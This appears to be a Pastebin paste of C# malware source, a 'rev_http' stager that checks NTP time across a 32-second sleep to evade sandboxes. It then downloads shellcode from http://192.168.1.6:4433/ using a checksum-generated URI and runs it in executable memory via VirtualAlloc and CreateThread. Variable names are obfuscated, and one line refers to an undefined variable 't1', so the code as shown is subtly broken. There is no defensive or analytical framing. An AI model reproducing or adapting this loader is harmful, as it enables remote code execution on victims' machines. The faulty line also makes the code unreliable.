Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.Net;
- using System.Net.Sockets;
- using System.Linq;
- using System.Runtime.InteropServices;
- using System.Threading;
- namespace payload
- {
- class rev_http
- {
- static string randomString(Random r, int s)
- {
- char[] buffer = new char[s];
- string chars = "kHp1adhiY7qmJQcNZOtMKCX2Iw0eunx8fjE96sAUoGT5WF3rVgyBPzblRvLDS4";
- for (int i = 0; i < s; i++)
- {
- buffer[i] = chars[r.Next(chars.Length)];
- }
- return new string(buffer);
- }
- static bool checksum8(string s)
- {
- return ((s.ToCharArray().Select(x => (int)x).Sum()) % 0x100 == 92);
- }
- static string genHTTPChecksum(Random r)
- {
- string baseString = "";
- for (int i = 0; i < 64; ++i)
- {
- baseString = randomString(r, 3);
- //62
- string randChars = new string("czPRh9FVwebjIaTWgdKil1H2yMoUXksrvZGDQEJYSntOx0BC7qmNL58uAf346p".ToCharArray().OrderBy(s => (r.Next(2) % 2) == 0).ToArray());
- for (int j = 0; j < randChars.Length; ++j)
- {
- string urlName = baseString + randChars[j];
- if (checksum8(urlName))
- {
- return urlName;
- }
- }
- }
- return "9vXU";
- }
- static byte[] getData(string str)
- {
- WebClient webClient = new System.Net.WebClient();
- webClient.Headers.Add("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");
- webClient.Headers.Add("Accept", "*/*");
- webClient.Headers.Add("Accept-Language", "en-gb,en;q=0.5");
- webClient.Headers.Add("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7");
- byte[] s = null;
- try
- {
- s = webClient.DownloadData(str);
- if (s.Length < 100000) return null;
- }
- catch (WebException) { }
- return s;
- }
- static void inject(byte[] s)
- {
- if (s != null)
- {
- UInt32 funcAddr = VirtualAlloc(0, (UInt32)s.Length, 0x1000, 0x40);
- Marshal.Copy(s, 0, (IntPtr)(funcAddr), s.Length);
- IntPtr hThread = IntPtr.Zero;
- UInt32 threadId = 0;
- IntPtr pinfo = IntPtr.Zero;
- hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
- WaitForSingleObject(hThread, 0xFFFFFFFF);
- }
- }
- static void Main()
- {
- var NTPTransmit = new byte[48];
- NTPTransmit[0] = 0x1B;
- var secondTransmit = new byte[48];
- secondTransmit[0] = 0x1B;
- var skip = false;
- var addr = Dns.GetHostEntry("us.pool.ntp.org").AddressList;
- var sock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
- try
- {
- sock.Connect(new IPEndPoint(addr[0], 123));
- sock.ReceiveTimeout = 6000;
- sock.Send(NTPTransmit);
- sock.Receive(NTPTransmit); sock.Close();
- }
- catch
- {
- skip = true;
- }
- ulong runTotal = 0;
- for (int i = 40; i <= 43; ++i)
- {
- runTotal = runTotal * 256 + (uint)NTPTransmit[i];
- }
- var time1 = (new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * runTotal);
- Thread.Sleep(32 * 1000);
- var newSock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
- try
- {
- var addr2 = Dns.GetHostEntry("us.pool.ntp.org").AddressList;
- newSock.Connect(new IPEndPoint(addr2[0], 123));
- newSock.ReceiveTimeout = 6000;
- newSock.Send(secondTransmit);
- newSock.Receive(secondTransmit);
- newSock.Close();
- }
- catch
- {
- skip = true;
- }
- ulong secondTotal = 0;
- for (int i = 40; i <= 43; ++i)
- {
- secondTotal = secondTotal * 256 + (uint)secondTransmit[i];
- }
- if (((new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * secondTotal) - t1).Seconds >= 32 || skip)
- {
- Random WTHFHfSFwf = new Random((int)DateTime.Now.Ticks);
- byte[] KnPUqLweupSUTd = getData("http://192.168.1.6:4433/" + genHTTPChecksum(WTHFHfSFwf));
- inject(KnPUqLweupSUTd);
- }
- }
- [DllImport("kernel32")]
- private static extern UInt32 VirtualAlloc(UInt32 MOHHihtHuKLCD, UInt32 imlHarLkgZ, UInt32 zJGnTkxid, UInt32 UyqoMcQNxYUIlU);
- [DllImport("kernel32")]
- private static extern IntPtr CreateThread(UInt32 hahkGAnKO, UInt32 bxZIGGS, UInt32 oarivwSN, IntPtr TYKTHkbceeEJUr, UInt32 GdFMDWJStrTPBx, ref UInt32 ULfFYCrSfa);
- [DllImport("kernel32")]
- private static extern UInt32 WaitForSingleObject(IntPtr tPMBff, UInt32 wvwtGBedj);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement